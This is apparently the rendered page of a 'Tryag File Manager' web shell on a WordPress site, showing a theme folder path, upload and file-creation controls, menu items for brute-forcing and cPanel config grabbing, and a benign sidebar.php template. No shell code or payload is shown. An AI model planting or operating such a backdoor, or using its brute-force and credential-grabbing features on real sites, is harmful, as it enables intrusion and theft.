Tryag File Manager
Home
||
Turbo Force
||
B-F Config_Cpanel
Current Path :
/
home
/
ynormeco
/
public_html
/
blog
/
wp-content
/
themes
/
blogrank
/
Or
Select Your Path :
Upload File :
New :
File
Dir
/home/ynormeco/public_html/blog/wp-content/themes/blogrank/sidebar.php
<?php /** * The sidebar containing the main widget area. * * @link https://developer.wordpress.org/themes/basics/template-files/#template-partials * * @package blogrank */ ?> <aside id="secondary" class="widget-area sidebar"> <?php if ( is_home() && is_active_sidebar( 'home-sidebar' ) ) { ?> <?php dynamic_sidebar( 'home-sidebar' ); ?> <?php } else { ?> <?php dynamic_sidebar( 'sidebar-1' ); ?> <?php } ?> </aside><!-- #secondary -->